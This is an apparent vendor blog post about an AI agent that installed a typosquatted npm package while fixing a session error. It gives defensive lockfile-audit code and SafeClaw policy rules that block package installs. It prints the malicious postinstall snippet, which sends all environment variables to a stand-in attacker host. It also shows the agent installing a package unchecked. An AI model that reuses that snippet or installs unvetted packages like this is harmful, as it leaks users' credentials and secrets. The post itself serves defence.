2026-01-27 · Authensor

AI Agent Installed a Malicious npm Package

An AI agent resolved a dependency error by running npm install express-sesssion (note the triple-s typo) — a typosquatted package that ran a postinstall script exfiltrating all environment variables to an attacker-controlled server. SafeClaw by Authensor prevents this by gating all package installation commands through policy rules that validate package names against an allowlist before execution.

The Incident: Supply Chain Attack via Agent

Context: A developer asked an AI agent to "fix the session handling error." The agent determined a missing dependency was the cause.

What happened:

  1. The agent identified a missing session middleware import.
  2. It decided to install the package: npm install express-sesssion (typosquatted name).
  3. npm downloaded and installed the malicious package without warning.
  4. The package's postinstall script ran immediately, executing:
     const https = require('https');
     const data = JSON.stringify(process.env);
     https.request({hostname: 'collect.evil.example', path: '/env', method: 'POST'}, () => {}).end(data);
  5. All environment variables, including DATABASE_URL, JWT_SECRET and STRIPE_KEY, were sent to the attacker.
  6. The team did not notice until a security audit two weeks later found the rogue package in package-lock.json.

Root cause: The agent had unrestricted shell access to run npm install. No policy validated the package name against known-good packages or flagged the typosquatted name. The npm postinstall script ran automatically.
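The audit that found the rogue package two weeks later can be run at install time instead. The following is an added example (my code, not SafeClaw's and not from the incident): it reads an npm lockfile (the v2/v3 `packages` map), reports direct dependencies missing from an allowlist, any package in the tree whose name is within two edits of an allowlisted name (the typosquat signature), and any package that declares an install script (the lockfile's `hasInstallScript` flag). The lockfile below is constructed to mirror the incident; the allowlist and the two-edit threshold are assumptions.

```javascript
// Added example, not SafeClaw code: audit an npm lockfile for direct
// dependencies outside an allowlist, near misses of allowlisted names
// (typosquats) and packages that declare install scripts.
'use strict';

// Levenshtein edit distance: single-character edits needed to turn a into b.
function editDistance(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + cost);
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Closest allowlisted name within maxDistance edits, or null.
function nearestAllowlisted(name, allowlist, maxDistance) {
  let best = null;
  for (const good of allowlist) {
    const distance = editDistance(name, good);
    if (distance <= maxDistance && (best === null || distance < best.distance)) {
      best = { name: good, distance };
    }
  }
  return best;
}

// lock: parsed package-lock.json (lockfileVersion 2 or 3, which carry the
// `packages` map keyed by install path). allowlist: Set of known-good names.
function auditLock(lock, allowlist, maxDistance = 2) {
  const root = lock.packages[''] || {};
  const direct = new Set(Object.keys(root.dependencies || {}));
  const findings = [];
  for (const [installPath, entry] of Object.entries(lock.packages)) {
    if (installPath === '') continue; // the project itself
    // Strip nesting (node_modules/a/node_modules/b) and keep scoped names intact.
    const name = installPath.slice(installPath.lastIndexOf('node_modules/') + 'node_modules/'.length);
    if (allowlist.has(name)) continue;
    const nearest = nearestAllowlisted(name, allowlist, maxDistance);
    const reasons = [];
    if (direct.has(name)) reasons.push('direct dependency not in allowlist');
    if (nearest) reasons.push(`within ${nearest.distance} edit(s) of allowlisted "${nearest.name}"`);
    if (entry.hasInstallScript) reasons.push('declares an install script');
    // Unlisted transitive dependencies with no other signal are not reported,
    // otherwise every express install would page someone.
    if (reasons.length) {
      findings.push({ name, version: entry.version, reasons, suspectedTyposquatOf: nearest ? nearest.name : null });
    }
  }
  return findings;
}

// Constructed sample mirroring the incident (assumption: not the team's real lockfile).
const sampleLock = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', dependencies: { express: '^4.19.2', 'express-sesssion': '^1.0.0' } },
    'node_modules/express': { version: '4.19.2' },
    'node_modules/cookie': { version: '0.6.0' },                              // transitive, benign
    'node_modules/express-sesssion': { version: '1.0.0', hasInstallScript: true }, // the typosquat
  },
};
const allowlist = new Set(['express', 'express-session', 'typescript']);

for (const f of auditLock(sampleLock, allowlist)) console.log(JSON.stringify(f));
```

On a real project, feed it `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` and fail the CI job on any finding. The near-miss check is what catches the triple-s package: it is one edit away from express-session, is a direct dependency that nobody allowlisted, and carries an install script, which is exactly the combination the incident describes.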

Why AI Agents Make This Worse

A human developer who reads the install command before running it has a chance of noticing the extra s. An agent usually does not: it maps the failing import to the nearest-looking package name, runs the install, and moves on to the next error without a review step. Because it optimizes for "resolve the error" rather than "install the right package", an attacker only needs to publish a name that looks like the one the agent expects, which makes agents a prime vector for supply chain attacks.

How SafeClaw Prevents This

Quick Start

npx @authensor/safeclaw

Policy for Package Installation Control

# safeclaw.config.yaml
rules:
  # Allow installation of known-good packages only
  - action: shell.execute
    command_pattern: "npm install express"
    decision: allow

  - action: shell.execute
    command_pattern: "npm install express-session"
    decision: allow

  - action: shell.execute
    command_pattern: "npm install typescript"
    decision: allow

  # Block all other npm install commands
  - action: shell.execute
    command_pattern: "npm install *"
    decision: deny
    reason: "Package installation requires allowlisted package name"

  # Block yarn and pnpm too
  - action: shell.execute
    command_pattern: "yarn add *"
    decision: deny
    reason: "Package installation requires policy approval"

  - action: shell.execute
    command_pattern: "pnpm add *"
    decision: deny
    reason: "Package installation requires policy approval"

  # Block pip installs for Python projects
  - action: shell.execute
    command_pattern: "pip install *"
    decision: deny
    reason: "Python package installation requires policy approval"
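To make the matching behaviour concrete, here is an added example evaluator (my code, not SafeClaw's implementation) for rules of the shape above. Its semantics are assumptions to check against SafeClaw's documentation: `*` matches any run of characters, rules are tried top to bottom with the first match winning, and a command that matches no rule is denied. It also folds some of npm's install aliases (`npm i`, `npm add` and others; `npm help install` lists them) into `npm install`, so an alias cannot route around the rules.

```javascript
// Added example, not SafeClaw code: evaluate command_pattern rules against a
// shell command. Assumed semantics (mine, not documented SafeClaw behaviour):
// '*' matches any run of characters, first matching rule wins, default deny.
'use strict';

// Mirrors the rules in safeclaw.config.yaml above.
const rules = [
  { action: 'shell.execute', command_pattern: 'npm install express', decision: 'allow' },
  { action: 'shell.execute', command_pattern: 'npm install express-session', decision: 'allow' },
  { action: 'shell.execute', command_pattern: 'npm install typescript', decision: 'allow' },
  { action: 'shell.execute', command_pattern: 'npm install *', decision: 'deny',
    reason: 'Package installation requires allowlisted package name' },
  { action: 'shell.execute', command_pattern: 'yarn add *', decision: 'deny',
    reason: 'Package installation requires policy approval' },
  { action: 'shell.execute', command_pattern: 'pnpm add *', decision: 'deny',
    reason: 'Package installation requires policy approval' },
  { action: 'shell.execute', command_pattern: 'pip install *', decision: 'deny',
    reason: 'Python package installation requires policy approval' },
];

// Compile a glob-style pattern into an anchored regex; only '*' is special.
function globToRegExp(pattern) {
  const escaped = pattern
    .replace(/[.+?^${}()|[\]\\]/g, '\\$&') // escape regex metacharacters
    .replace(/\*/g, '.*');                 // '*' matches anything, including nothing
  return new RegExp(`^${escaped}$`);
}

// Some of npm's aliases for `install` (assumption: see `npm help install`).
// Without this, `npm i express-sesssion` would miss every `npm install` rule.
const NPM_INSTALL_ALIASES = new Set(['i', 'in', 'ins', 'inst', 'add', 'isntall']);

// Collapse whitespace and canonicalize the npm subcommand before matching.
function normalize(command) {
  const tokens = command.trim().split(/\s+/);
  if (tokens[0] === 'npm' && NPM_INSTALL_ALIASES.has(tokens[1])) tokens[1] = 'install';
  return tokens.join(' ');
}

// First matching rule wins; a command that matches nothing is denied.
function evaluate(command, ruleset = rules) {
  const normalized = normalize(command);
  for (const rule of ruleset) {
    if (rule.action !== 'shell.execute') continue;
    if (globToRegExp(rule.command_pattern).test(normalized)) {
      return {
        action: 'shell.execute',
        command,
        decision: rule.decision,
        reason: rule.reason || `matched allow rule "${rule.command_pattern}"`,
      };
    }
  }
  return { action: 'shell.execute', command, decision: 'deny', reason: 'no rule matched (default deny)' };
}

for (const cmd of [
  'npm install express-session',    // allowlisted: allow
  'npm install express-sesssion',   // the typosquat: deny via the wildcard rule
  'npm i express-sesssion',         // alias: normalized, still deny
  'npm install express --save-dev', // flags miss the exact allow rule: deny
  'npm install',                    // bare install from package.json: no rule matches, default deny
  'yarn add express',               // other package managers: deny
]) {
  console.log(JSON.stringify(evaluate(cmd)));
}
```

Two results are worth noting when writing the real policy. A flag such as `--save-dev` makes the command miss the exact allow rule and fall through to the wildcard deny, which is safe but will generate friction. And a bare `npm install` (the agent edits package.json to add the typosquat, then installs from it) matches none of the patterns above, so whether it is blocked depends on the engine's default, which this example sets to deny. Confirm both behaviours against SafeClaw before relying on them.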

Interception Result

When the agent tries npm install express-sesssion (typosquatted):

{
  "action": "shell.execute",
  "command": "npm install express-sesssion",
  "decision": "deny",
  "reason": "Package installation requires allowlisted package name",
  "timestamp": "2026-02-13T11:42:08Z",
  "audit_hash": "sha256:b1d4..."
}

The typosquatted package is never downloaded or installed. The postinstall script never runs. Your environment variables stay safe.

Additional Defenses

SafeClaw is the first line of defense. Complement it with:

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw